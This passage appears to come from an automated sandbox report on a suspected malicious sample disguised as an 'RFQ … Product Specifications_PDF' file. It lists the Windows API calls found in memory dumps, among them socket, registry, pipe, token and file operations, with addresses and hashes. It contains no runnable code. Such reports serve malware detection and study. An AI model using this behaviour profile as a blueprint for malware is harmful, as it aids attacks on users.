                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AC307A
                                                                                                                  • Part of subcall function 00AC304E: _wcslen.LIBCMT ref: 00AC309B
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AC1112
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1121
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC11C9
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC11F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2675159561-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AACF22,?), ref: 00AADDFD
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AACF22,?), ref: 00AADE16
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00AACF45
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00AACF7F
                                                                                                                • _wcslen.LIBCMT ref: 00AAD005
                                                                                                                • _wcslen.LIBCMT ref: 00AAD01B
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00AAD061
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 3164238972-1173974218
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AD2E1C
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD2E4F
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD2E84
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AD2EB6
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AD2EE0
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD2EF1
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AD2F0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA7769
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA778F
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AA7792
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AA77B0
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AA77B9
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00AA77DE
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AA77EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA7842
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA7868
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AA786B
                                                                                                                • SysAllocString.OLEAUT32 ref: 00AA788C
                                                                                                                • SysFreeString.OLEAUT32 ref: 00AA7895
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00AA78AF
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AA78BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00AB04F2
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AB052E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandlePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00AB05C6
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AB0601
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandlePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A4600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A4604C
                                                                                                                  • Part of subcall function 00A4600E: GetStockObject.GDI32(00000011), ref: 00A46060
                                                                                                                  • Part of subcall function 00A4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A4606A
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AD4112
                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AD411F
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AD412A
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AD4139
                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AD4145
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A7D7A3: _free.LIBCMT ref: 00A7D7CC
                                                                                                                • _free.LIBCMT ref: 00A7D82D
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7D838
                                                                                                                • _free.LIBCMT ref: 00A7D843
                                                                                                                • _free.LIBCMT ref: 00A7D897
                                                                                                                • _free.LIBCMT ref: 00A7D8A2
                                                                                                                • _free.LIBCMT ref: 00A7D8AD
                                                                                                                • _free.LIBCMT ref: 00A7D8B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AADA74
                                                                                                                • LoadStringW.USER32(00000000), ref: 00AADA7B
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AADA91
                                                                                                                • LoadStringW.USER32(00000000), ref: 00AADA98
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AADADC
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00AADAB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 4072794657-3128320259
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(0115E370,0115E370), ref: 00AB097B
                                                                                                                • EnterCriticalSection.KERNEL32(0115E350,00000000), ref: 00AB098D
                                                                                                                • TerminateThread.KERNEL32(01159C78,000001F6), ref: 00AB099B
                                                                                                                • WaitForSingleObject.KERNEL32(01159C78,000003E8), ref: 00AB09A9
                                                                                                                • CloseHandle.KERNEL32(01159C78), ref: 00AB09B8
                                                                                                                • InterlockedExchange.KERNEL32(0115E370,000001F6), ref: 00AB09C8
                                                                                                                • LeaveCriticalSection.KERNEL32(0115E350), ref: 00AB09CF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                APIs
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AC1DC0
                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AC1DE1
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1DF2
                                                                                                                • htons.WSOCK32(?,?,?,?,?), ref: 00AC1EDB
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00AC1E8C
                                                                                                                  • Part of subcall function 00AA39E8: _strlen.LIBCMT ref: 00AA39F2
                                                                                                                  • Part of subcall function 00AC3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00ABEC0C), ref: 00AC3240
                                                                                                                • _strlen.LIBCMT ref: 00AC1F35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00A45D30
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A45D71
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A45D99
                                                                                                                • GetClientRect.USER32(?,?), ref: 00A45ED7
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A45EF8
                                                                                                                APIs
                                                                                                                • __allrem.LIBCMT ref: 00A700BA
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A700D6
                                                                                                                • __allrem.LIBCMT ref: 00A700ED
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7010B
                                                                                                                • __allrem.LIBCMT ref: 00A70122
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A70140
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A682D9,00A682D9,?,?,?,00A7644F,00000001,00000001,8BE85006), ref: 00A76258
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A7644F,00000001,00000001,8BE85006,?,?,?), ref: 00A762DE
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A763D8
                                                                                                                • __freea.LIBCMT ref: 00A763E5
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                • __freea.LIBCMT ref: 00A763EE
                                                                                                                • __freea.LIBCMT ref: 00A76413
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00ACC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ACB6AE,?,?), ref: 00ACC9B5
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACC9F1
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA68
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA9E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACBCCA
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ACBD25
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACBD6A
                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00ACBD99
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00ACBDF3
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACBDFF
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000035), ref: 00A9F7B9
                                                                                                                • SysAllocString.OLEAUT32(00000001), ref: 00A9F860
                                                                                                                • VariantCopy.OLEAUT32(00A9FA64,00000000), ref: 00A9F889
                                                                                                                • VariantClear.OLEAUT32(00A9FA64), ref: 00A9F8AD
                                                                                                                • VariantCopy.OLEAUT32(00A9FA64,00000000), ref: 00A9F8B1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A9F8BB
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00AB94E5
                                                                                                                • _wcslen.LIBCMT ref: 00AB9506
                                                                                                                • _wcslen.LIBCMT ref: 00AB952D
                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00AB9585
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • BeginPaint.USER32(?,?,?), ref: 00A59241
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A592A5
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A592C2
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A592D3
                                                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 00A59321
                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A971EA
                                                                                                                  • Part of subcall function 00A59339: BeginPath.GDI32(00000000), ref: 00A59357
                                                                                                                Similarity
                                                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 3050599898-0
                                                                                                                • Opcode ID: c0fa4dc1c75b6da7d8ad4fea7e65707ffc8ebe6d16eccdc26ff5aabb5e573006
                                                                                                                • Instruction ID: c5816bc484526e52e3ad4ccec25cf0f6b92724eccc4ab805936204e4336c45db
                                                                                                                • Opcode Fuzzy Hash: c0fa4dc1c75b6da7d8ad4fea7e65707ffc8ebe6d16eccdc26ff5aabb5e573006
                                                                                                                • Instruction Fuzzy Hash: 4141BE30205201EFDB10DF68C884FAB7BF8FB55361F140629FA658B2A1C730984ADB61
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AB080C
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00AB0847
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00AB0863
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00AB08DC
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00AB08F3
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AB0921
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 3368777196-0
                                                                                                                • Opcode ID: 6c9fd3fac588172efbadd2ffb7e10f55388315239bf538ef9b52bc09c58e8b1d
                                                                                                                • Instruction ID: 40e4f5c7e70da78f20a9f6b869116d650850d0c1f1e1fd998a6b5f8196d29b06
                                                                                                                • Opcode Fuzzy Hash: 6c9fd3fac588172efbadd2ffb7e10f55388315239bf538ef9b52bc09c58e8b1d
                                                                                                                • Instruction Fuzzy Hash: F0416771900205EFDF14EF94DC85AAAB7B8FF04310F1440A9ED00AA297DB30DE65DBA0
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A9F3AB,00000000,?,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00AD824C
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00AD8272
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AD82D1
                                                                                                                • ShowWindow.USER32(00000000,00000004), ref: 00AD82E5
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 00AD830B
                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AD832F
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: 563696d365316630c0d95af8fb8dd63da55d22d06e90830e9ba45692027b51fc
                                                                                                                • Instruction ID: ec2efd6a7a5a566a2eda2774cd6e07d77ab3eebb737c1cbcd4188f6198772ee8
                                                                                                                • Opcode Fuzzy Hash: 563696d365316630c0d95af8fb8dd63da55d22d06e90830e9ba45692027b51fc
                                                                                                                • Instruction Fuzzy Hash: 2541B834601644AFDB11CF25CC95BE47BF0FB4A715F5842AAE62A4F372CB35A842CB50
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00AA4C95
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AA4CB2
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AA4CEA
                                                                                                                • _wcslen.LIBCMT ref: 00AA4D08
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AA4D10
                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00AA4D1A
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 72514467-0
                                                                                                                • Opcode ID: ceda879335234ba28d26d4832a157f8db036a103336e8c3645224f45453f8dab
                                                                                                                • Instruction ID: 124f84c10f71cd37bc7044eec11235796c507121051bcf4fb981107fd4067182
                                                                                                                • Opcode Fuzzy Hash: ceda879335234ba28d26d4832a157f8db036a103336e8c3645224f45453f8dab
                                                                                                                • Instruction Fuzzy Hash: EB21D7326052017BEB159B79DD4AE7B7BACDF8A760F10802AF809CB1D1DBB5DC01D6A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                • _wcslen.LIBCMT ref: 00AB587B
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AB5995
                                                                                                                • CoCreateInstance.OLE32(00ADFCF8,00000000,00000001,00ADFB68,?), ref: 00AB59AE
                                                                                                                • CoUninitialize.OLE32 ref: 00AB59CC
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 3172280962-24824748
                                                                                                                • Opcode ID: 72295a12d81b42c31d97aea9476bcb7e3c3aa913c84426939230f44bda75648d
                                                                                                                • Instruction ID: b83e59f44836f988710ab0b4e33d3f24a5a5d3824979a127c30b8e306fddbaff
                                                                                                                • Opcode Fuzzy Hash: 72295a12d81b42c31d97aea9476bcb7e3c3aa913c84426939230f44bda75648d
                                                                                                                • Instruction Fuzzy Hash: 34D14275A087019FC714DF24C584A6ABBE9FF89710F14885DF88A9B362DB31EC45CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AA0FCA
                                                                                                                  • Part of subcall function 00AA0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AA0FD6
                                                                                                                  • Part of subcall function 00AA0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AA0FE5
                                                                                                                  • Part of subcall function 00AA0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AA0FEC
                                                                                                                  • Part of subcall function 00AA0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AA1002
                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,00AA1335), ref: 00AA17AE
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AA17BA
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00AA17C1
                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AA17DA
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00AA1335), ref: 00AA17EE
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA17F5
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                • String ID:
                                                                                                                • API String ID: 3008561057-0
                                                                                                                • Opcode ID: 60045828c7318acb4874ef3d3b4eab4d954c764dac3c1555f521a841b14a445e
                                                                                                                • Instruction ID: f37201a944e0951eafe30d94f27eba084b3889835584f9924ad92ffd7184969f
                                                                                                                • Opcode Fuzzy Hash: 60045828c7318acb4874ef3d3b4eab4d954c764dac3c1555f521a841b14a445e
                                                                                                                • Instruction Fuzzy Hash: 2B11BB32601216FFDB10DFA4CC49FAE7BB9EB42365F104119F482A7290D736A941CF60
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AA14FF
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00AA1506
